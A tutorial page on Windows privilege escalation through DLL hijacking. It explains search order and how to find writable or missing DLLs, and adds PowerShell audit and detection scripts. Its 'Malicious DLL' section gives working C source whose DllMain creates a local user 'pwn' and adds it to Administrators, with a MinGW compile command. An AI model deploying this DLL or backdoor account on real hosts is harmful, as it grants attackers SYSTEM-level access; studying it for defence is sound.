Windows Privilege Escalation with DLL Hijacking

Contains the details of the topic Privilege Escalation/Windows/Various/DLL Injection.

The technique is similar to Modifiable Service Binaries, but it targets the DLLs (Dynamic Link Libraries) that a service binary loads rather than the binary itself.

We can:

  • Overwrite a DLL: replace an existing DLL that the service loads and that a low-privileged user can write to.

  • Hijack the DLL search order: place a DLL with the same name in a directory the loader searches before the directory holding the legitimate copy.

  • Exploit a missing DLL: supply a DLL that the application tries to load but that is absent from every directory in the search path.

Search Order

Which DLL search order the loader uses depends on whether Safe DLL Search Mode is enabled; it is enabled by default.

With this mode enabled, an application's DLLs are searched for in the following sequence:

  1. The directory from which the application is loaded.

  2. The system directory.

  3. The 16-bit system directory.

  4. The Windows directory.

  5. The current directory.

  6. The directories that are listed in the PATH environment variable.

However, if Safe DLL Search Mode is disabled, the current directory moves up to second place and the order becomes:

  1. The directory from which the application is loaded.

  2. The current directory.

  3. The system directory.

  4. The 16-bit system directory.

  5. The Windows directory.

  6. The directories that are listed in the PATH environment variable.

Pinpoint a DLL

Enumerate the DLLs that each service loads and check two things for every one of them: the permissions on the DLL and on its directory (a DLL or directory that a low-privileged user can write to can be overwritten or pre-empted by a copy placed earlier in the search order), and whether the DLL is missing altogether (an application that tries to load a DLL that does not exist walks the directories listed above in order, so any writable directory in that list can supply it).
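The audit described above can be scripted. The following PowerShell is an added example written for this page, not code from the original note: it reads the SafeDllSearchMode value from HKLM\SYSTEM\CurrentControlSet\Control\Session Manager (an absent value or any non-zero value means the safe mode is in effect), builds the effective search order for each service's executable directory, and reports every directory in that order in which Everyone, Authenticated Users or BUILTIN\Users can create files. The function names, the choice of those three principals as the "low-privileged" threshold, and the use of the system directory as a service's current directory are this example's own assumptions; it needs an elevated PowerShell on the Windows host being audited and changes nothing.

```powershell
# Added audit example (not from the original page). Requires an elevated
# PowerShell on the Windows host; nothing here modifies the system.

$sessionManager = 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager'
$safeModeValue  = (Get-ItemProperty -Path $sessionManager -Name 'SafeDllSearchMode' `
                      -ErrorAction SilentlyContinue).SafeDllSearchMode
# The value is normally absent, which means the safe mode is in effect;
# only an explicit 0 disables it.
$safeSearchEnabled = ($null -eq $safeModeValue) -or ($safeModeValue -ne 0)

# Principals whose ability to create files in a search-path directory lets a
# low-privileged user plant a DLL there (assumption: this list defines
# "writable by low-privileged users" for this audit).
$lowPrivilegedSids = @('S-1-1-0', 'S-1-5-11', 'S-1-5-32-545')  # Everyone, Authenticated Users, BUILTIN\Users

function Get-DllSearchOrder {
    # Reproduce the two orders from the Search Order section for one application directory.
    param([string]$ApplicationDirectory, [bool]$SafeSearch)
    $windowsDir = $env:SystemRoot
    $systemDir  = Join-Path $windowsDir 'System32'
    $system16   = Join-Path $windowsDir 'System'
    # Assumption: services are started by the Service Control Manager with the
    # system directory as their current directory.
    $currentDir = $systemDir
    $pathDirs   = $env:Path -split ';' | Where-Object { $_.Trim() -ne '' }
    if ($SafeSearch) {
        @($ApplicationDirectory, $systemDir, $system16, $windowsDir, $currentDir) + $pathDirs
    } else {
        @($ApplicationDirectory, $currentDir, $systemDir, $system16, $windowsDir) + $pathDirs
    }
}

$aclCache = @{}
function Test-LowPrivilegedCreate {
    # True when one of the low-privileged principals holds an Allow ACE granting
    # CreateFiles/WriteData (right bit 0x2) on the directory.
    param([string]$Directory)
    if ([string]::IsNullOrWhiteSpace($Directory)) { return $false }
    if ($aclCache.ContainsKey($Directory)) { return $aclCache[$Directory] }
    $result = $false
    if (Test-Path -LiteralPath $Directory -PathType Container) {
        foreach ($ace in (Get-Acl -LiteralPath $Directory).Access) {
            if ($ace.AccessControlType -ne 'Allow') { continue }
            try {
                $sid = $ace.IdentityReference.Translate([System.Security.Principal.SecurityIdentifier]).Value
            } catch { continue }   # orphaned or untranslatable identity
            if (($lowPrivilegedSids -contains $sid) -and (([int]$ace.FileSystemRights -band 0x2) -ne 0)) {
                $result = $true
                break
            }
        }
    }
    $aclCache[$Directory] = $result
    return $result
}

$findings = foreach ($svc in (Get-CimInstance Win32_Service | Where-Object { $_.PathName })) {
    # PathName may be quoted and may carry arguments; keep only the executable.
    $m   = [regex]::Match($svc.PathName, '^"([^"]+)"|^(\S+)')
    $exe = if ($m.Groups[1].Success) { $m.Groups[1].Value } else { $m.Groups[2].Value }
    $appDir = Split-Path -Parent $exe
    foreach ($dir in (Get-DllSearchOrder -ApplicationDirectory $appDir -SafeSearch $safeSearchEnabled)) {
        if (Test-LowPrivilegedCreate -Directory $dir) {
            [pscustomobject]@{ Service = $svc.Name; RunsAs = $svc.StartName; WritableSearchDir = $dir }
        }
    }
}

"SafeDllSearchMode in effect: $safeSearchEnabled"
$findings | Sort-Object WritableSearchDir, Service -Unique | Format-Table -AutoSize
```

Every row in the output is a directory that a low-privileged user could place a DLL in and that a service running as the listed account will consult when resolving a DLL name; the rows for services running as LocalSystem are the ones to fix first, by tightening the directory ACL or by moving the service out of the writable location. The PATH directories come from the auditing session's environment, so run the script from the same kind of session (system-wide PATH, not a user-modified one) that the services see.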

Malicious DLL

Each DLL can export an optional entry point function called DllMain, which the loader calls when a process or thread attaches to or detaches from the DLL. The function usually switches on four reasons: DLL_PROCESS_ATTACH, DLL_THREAD_ATTACH, DLL_THREAD_DETACH and DLL_PROCESS_DETACH. Code placed under DLL_PROCESS_ATTACH runs as soon as the DLL is loaded, in the security context of the loading process, which is why a DLL loaded by a service running as LocalSystem yields SYSTEM privileges.

myDLL.c

#include <stdlib.h>
#include <windows.h>

BOOL APIENTRY DllMain( HANDLE hModule,             // Handle to DLL module
                       DWORD ul_reason_for_call,   // Reason for calling function
                       LPVOID lpReserved )         // Reserved
{
    int i; /* declared before the switch: C does not allow a declaration directly after a case label */

    switch ( ul_reason_for_call )
    {
        case DLL_PROCESS_ATTACH: // A process is loading the DLL; this runs in that process's security context.
            i = system ("net user pwn password123! /add");
            i = system ("net localgroup administrators pwn /add");
            break;
        case DLL_THREAD_ATTACH: // A process is creating a new thread.
            break;
        case DLL_THREAD_DETACH: // A thread exits normally.
            break;
        case DLL_PROCESS_DETACH: // A process unloads the DLL.
            break;
    }
    return TRUE;
}

Compile it as a DLL (cross-compiling from Linux with MinGW-w64):

x86_64-w64-mingw32-gcc myDLL.c --shared -o myDLL.dll
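From the defender's side, a DLL loaded this way is visible in the module list of the service process. The following PowerShell is an added detection example written for this page, not code from the original note: it enumerates the modules loaded by every running service process and flags each module that sits outside both the Windows directory and the service's own executable directory, or whose Authenticode signature does not verify. A DLL dropped into a PATH directory to stand in for a missing one fails the location check; a DLL overwritten inside the application directory passes the location check but fails the signature check. The function names and the two-directory notion of an "expected location" are this example's assumptions; it needs an elevated PowerShell whose bitness matches the processes inspected, because Get-Process -Module cannot read modules across bitness.

```powershell
# Added detection example (not from the original page). Lists the modules loaded
# by each running service process and flags those that sit outside both the
# Windows directory and the service's own executable directory, or whose
# Authenticode signature does not verify. Requires an elevated PowerShell whose
# bitness matches the inspected processes; it only reads and changes nothing.

$windowsDir = $env:SystemRoot

function Test-PathUnder {
    # True when $Path lies inside $Root (case-insensitive); a missing root never matches.
    param([string]$Path, [string]$Root)
    if ([string]::IsNullOrEmpty($Root)) { return $false }
    $prefix = $Root.TrimEnd('\') + '\'
    return $Path.StartsWith($prefix, [System.StringComparison]::OrdinalIgnoreCase)
}

function Get-SuspectServiceModules {
    $signatureCache = @{}
    foreach ($svc in (Get-CimInstance Win32_Service | Where-Object { $_.ProcessId -gt 0 })) {
        # Get-Process -Module fails for protected processes or across bitness; skip those.
        try {
            $proc    = Get-Process -Id $svc.ProcessId -ErrorAction Stop
            $modules = Get-Process -Id $svc.ProcessId -Module -ErrorAction Stop
        } catch { continue }
        $appDir = if ($proc.Path) { Split-Path -Parent $proc.Path } else { $null }
        foreach ($mod in $modules) {
            $file = $mod.FileName
            if (-not $file) { continue }
            $expectedLocation = (Test-PathUnder $file $windowsDir) -or (Test-PathUnder $file $appDir)
            if (-not $signatureCache.ContainsKey($file)) {
                # Get-AuthenticodeSignature also verifies catalog-signed Windows binaries.
                $signatureCache[$file] = (Get-AuthenticodeSignature -FilePath $file -ErrorAction SilentlyContinue).Status
            }
            $sigStatus = $signatureCache[$file]
            if (-not $expectedLocation -or $sigStatus -ne 'Valid') {
                [pscustomobject]@{
                    Service   = $svc.Name
                    RunsAs    = $svc.StartName
                    Module    = $file
                    Location  = if ($expectedLocation) { 'expected' } else { 'UNEXPECTED' }
                    Signature = $sigStatus
                }
            }
        }
    }
}

Get-SuspectServiceModules | Sort-Object Module -Unique | Format-Table -AutoSize
```

An unsigned module is not proof of tampering, since many third-party services ship unsigned DLLs, so treat the output as a triage list and compare it against a baseline taken from a known-good build of the same host; a module that is both in an unexpected location and unsigned, loaded by a service running as LocalSystem, is the combination that matches the scenario on this page.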
